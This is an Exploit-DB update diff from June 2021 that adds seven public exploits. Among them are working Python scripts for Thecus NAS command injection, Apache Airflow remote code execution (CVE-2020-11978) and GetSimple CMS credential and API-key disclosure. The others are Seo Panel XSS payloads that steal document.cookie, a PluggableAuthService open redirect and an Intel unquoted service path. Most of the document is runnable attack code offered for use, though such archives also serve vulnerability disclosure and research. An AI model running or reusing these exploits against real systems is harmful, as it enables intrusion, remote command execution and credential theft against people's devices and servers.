DB: 2021-06-03

7 changes to exploits/shellcodes

Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
Thecus N4800Eco Nas Server Control Panel - Comand Injection
Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
GetSimple CMS 3.3.4 - Information Disclosure
Products.PluggableAuthService 2.6.0 - Open Redirect
Seo Panel 4.8.0 - 'search_name' Reflected XSS
Seo Panel 4.8.0 - 'category' Reflected XSS

exploits/hardware/webapps/49926.py

@@ -0,0 +1,98 @@
+# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
+# Date: 01/06/2021
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: http://www.thecus.com/
+# Software Link: http://www.thecus.com/product.php?PROD_ID=83
+# Version: N4800Eco
+# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
+
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib3
+
+
+# To fix SSL error that occurs when the script is started.
+# 1- Open /etc/ssl/openssl.cnf file
+# At the bottom of the file:
+# [system_default_sect]
+# MinProtocol = TLSv1.2
+# CipherString = DEFAULT@SECLEVEL=2
+# 2- Set value of MinProtocol as TLSv1.0
+
+
+def readResult(s, target):
+    d = {
+        "fun": "setlog",
+        "action": "query",
+        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
+    }
+    url = "http://" + target + "/adm/setmain.php"
+    resultReq = s.post(url, data=d, verify=False)
+    dict = resultReq.text.split()
+    print("[+] Reading system log...\n")
+    print(dict[5:8])     #change this range to read whole output of the command
+
+def delUser(s, target, command):
+    d = {
+        "action": "delete",
+        "username": "$("+command+")"
+    }
+    url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
+    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+    if 'Local User remove succeeds' in delUserReq.text:
+        print('[+] %s command was executed successfully' % command)
+    else:
+        print('[-] %s command was not executed!' %command)
+        sys.exit(1)
+    readResult(s, target)
+
+def addUser(s, target, command):
+    d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
+    url = "http://" + target + "/adm/setmain.php?fun=setbatch"
+    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+    if 'Users and groups were created successfully.' in addUserReq.text:
+        print('[+] Users and groups were created successfully')
+    else:
+        print('[-] Users and groups were not created')
+        sys.exit(1)
+    delUser(s, target, command)
+
+def login(target, username, password, command=None):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    s = requests.Session()
+    d = {
+        "&eplang": "english",
+        "p_pass": password,
+        "p_user": username,
+        "username": username,
+        "pwd": password,
+        "action": "login",
+        "option": "com_extplorer"
+    }
+    url = "http://" + target + "/adm/login.php"
+    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+    if '"success":true' in loginReq.text:
+        print('[+] Authentication successful')
+    elif '"success":false' in loginReq.text:
+        print('[-] Authentication failed!')
+        sys.exit(1)
+    else:
+        print('[-] Something went wrong!')
+        sys.exit(1)
+    addUser(s, target, command)
+
+def main(args):
+    if len(args) != 5:
+        print("usage: %s targetIp:port username password command" % (args[0]))
+        print("Example 192.168.1.13:80 admin admin id")
+        sys.exit(1)
+    login(target=args[1], username=args[2], password=args[3], command=args[4])
+
+
+if __name__ == "__main__":
+    main(args=sys.argv)

exploits/multiple/webapps/49927.py

@@ -0,0 +1,116 @@
+# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution 
+# Date: 2021-06-02
+# Exploit Author: Pepe Berba
+# Vendor Homepage: https://airflow.apache.org/
+# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
+# Version: <= 1.10.10
+# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
+# CVE : CVE-2020-11978
+# 
+# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
+# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
+# Together, potentially allows unauthenticated RCE to Airflow 
+# 
+# Repo: https://github.com/pberba/CVE-2020-11978
+# More information can be found here:  
+# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
+# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
+#
+# Remediation:
+# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
+# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
+#
+# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"
+
+import argparse
+import requests
+import sys
+import time
+
+def create_dag(url, cmd):
+	print('[+] Checking if Airflow Experimental REST API is accessible...')
+	check = requests.get('{}/api/experimental/test'.format(url))
+
+	if check.status_code == 200:
+		print('[+] /api/experimental/test returned 200' )
+	else:
+		print('[!] /api/experimental/test returned {}'.format(check.status_code))
+		print('[!] Airflow Experimental REST API not be accessible')
+		sys.exit(1)
+
+	check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
+	if check_task.status_code != 200:
+		print('[!] Failed to find the example_trigger_target_dag.bash_task')
+		print('[!] Host isn\'t vunerable to CVE-2020-11978')
+		sys.exit(1)
+	elif 'dag_run' in check_task.json()['env']:
+		print('[!] example_trigger_target_dag.bash_task is patched')
+		print('[!] Host isn\'t vunerable to CVE-2020-11978')
+		sys.exit(1)
+	print('[+] example_trigger_target_dag.bash_task is vulnerable')
+
+	unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
+	if unpause.status_code != 200:
+		print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
+		sys.exit(1)
+	else:
+		print('[+] example_trigger_target_dag was enabled')
+
+	print('[+] Creating new DAG...')
+	res = requests.post(
+	    '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
+	    json={
+	        'conf': {
+	                'message': '"; {} #'.format(cmd)
+	        }
+	    }
+	)
+
+	if res.status_code == 200:
+		print('[+] Successfully created DAG')
+		print('[+] "{}"'.format(res.json()['message']))
+	else:
+		print('[!] Failed to create DAG')
+		sys.exit(1)
+
+	wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
+		url = url,
+		execution_date=res.json()['execution_date']
+	)
+
+	start_time = time.time()
+	print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
+	print('[.] If the bash task is never queued, then the scheduler might not be running.')
+	while True:
+		time.sleep(10)
+		res = requests.get(wait_url)
+		status = res.json()['state']
+		if status == 'queued':
+			print('[.] Bash task queued...')
+		elif status == 'running':
+			print('[+] Bash task running...')
+		elif status == 'success':
+			print('[+] Bash task successfully ran')
+			break
+		elif status == 'None':
+			print('[-] Bash task is not yet queued...'.format(status))
+		else:
+			print('[!] Bash task was {}'.format(status))
+			sys.exit(1)
+
+	return 0
+
+
+def main():
+	arg_parser = argparse.ArgumentParser()
+	arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
+	arg_parser.add_argument('command', type=str)
+	args = arg_parser.parse_args()
+
+	create_dag(
+		args.url, 
+		args.command
+	)
+
+if __name__ == '__main__':
+	main()

exploits/php/webapps/49928.py

@@ -0,0 +1,90 @@
+# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
+# Date 01.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: http://get-simple.info/
+# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
+# Version: 3.3.4
+# CVE: CVE-2014-8722
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
+
+
+'''
+Description:
+GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
+(1) data/users/<username>.xml,
+(2) backups/users/<username>.xml.bak,
+(3) data/other/authorization.xml, or
+(4) data/other/appid.xml.
+'''
+
+
+'''
+Import required modules:
+'''
+import sys
+import requests
+
+'''
+User-Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+cmspath = sys.argv[3]
+print('')
+username = input("Do you know the username? Y/N: ")
+if username == 'Y':
+    print('')
+    username = True
+    username_string = input('Please enter the username: ')
+else:
+    print('')
+    username = False
+    print('No problem, you will still get the API key')
+
+
+'''
+Get Api-Key:
+'''
+url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
+header = {
+        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+        "Accept-Encoding": "gzip, deflate",
+        "Connection": "close",
+        "Upgrade-Insecure-Requests": "1",
+        "Cache-Control": "max-age=0"
+}
+x = requests.get(url, headers=header).text
+start = x.find('[') + 7
+end = x.find(']')
+api_key = x[start:end]
+print('')
+print('Informations:')
+print('')
+print('[*] API Key: ' + api_key)
+
+
+if username:
+    '''
+    Get Email and Passwordhash:
+    '''
+    url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
+    header = {
+            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+            "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+            "Accept-Encoding": "gzip, deflate",
+            "Connection": "close",
+            "Upgrade-Insecure-Requests": "1",
+            "Cache-Control": "max-age=0"
+    }
+    x = requests.get(url, headers=header).text
+    start =  x[x.find('PWD>'):]
+    passwordhash = start[start.find('>') +1 :start.find('<')]
+    print('[*] Hashed Password: ' + passwordhash)
+
+    start = x[x.find('EMAIL>'):]
+    email = start[start.find('>') + 1 : start.find('<')]
+    print('[*] Email: ' + email)
+print('')

exploits/php/webapps/49931.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS
+# Date: 21-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link:  https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28417
+
+
+-Description:
+ A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Add below line at the end:
+http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
+3- Hover your mouse near to "CTR" field

exploits/php/webapps/49932.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
+# Date: 22-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link:  https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28418
+
+
+-Description:
+A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Visit:
+http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+3- Hover your mouse to "Cancel" field

exploits/python/webapps/49930.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect
+# Exploit Author: Piyush Patil
+# Affected Component: Pluggable Zope authentication/authorization framework
+# Component Link: https://pypi.org/project/Products.PluggableAuthService/
+# Version: < 2.6.1
+# CVE: CVE-2021-21337
+# Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr
+
+
+--------------------------Proof of Concept-----------------------
+
+1- Goto https://localhost/login
+2- Turn on intercept and click on the login
+3- Change "came_from" parameter value to https://attacker.com
+4- User will be redirected to an attacker-controlled website.
+
+Fix: pip install "Products.PluggableAuthService>=2.6.1"

exploits/windows/local/49929.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
+# Date: 06-01-2021
+# Exploit Author: Geovanni Ruiz
+# Vendor Homepage: https://www.intel.com
+# Software Version: 01.00.1080.0
+# File Version: 1.00.1080.0
+# Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname
+
+DisplayName             Name               PathName                                                               StartMode  StartName
+Intel(R) Audio Service  IntelAudioService  C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe  Auto       LocalSystem
+
+
+# 2. To check service info:
+
+C:\>sc qc "IntelAudioService"
+[SC] QueryServiceConfig CORRECTO
+		
+NOMBRE_SERVICIO: IntelAudioService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Intel(R) Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# 3. Exploit:
+
+To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order
+to gain SYSTEM privileges.

files_exploits.csv

@@ -11341,6 +11341,7 @@ id,file,description,date,author,type,platform,port
 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows,
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
+49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44088,3 +44089,9 @@ id,file,description,date,author,type,platform,port
 49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi,
 49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi,
 49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,
+49926,exploits/hardware/webapps/49926.py,"Thecus N4800Eco Nas Server Control Panel - Comand Injection",2021-06-02,"Metin Yunus Kandemir",webapps,hardware,
+49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,
+49928,exploits/php/webapps/49928.py,"GetSimple CMS 3.3.4 - Information Disclosure",2021-06-02,"Ron Jost",webapps,php,
+49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,
+49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
+49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,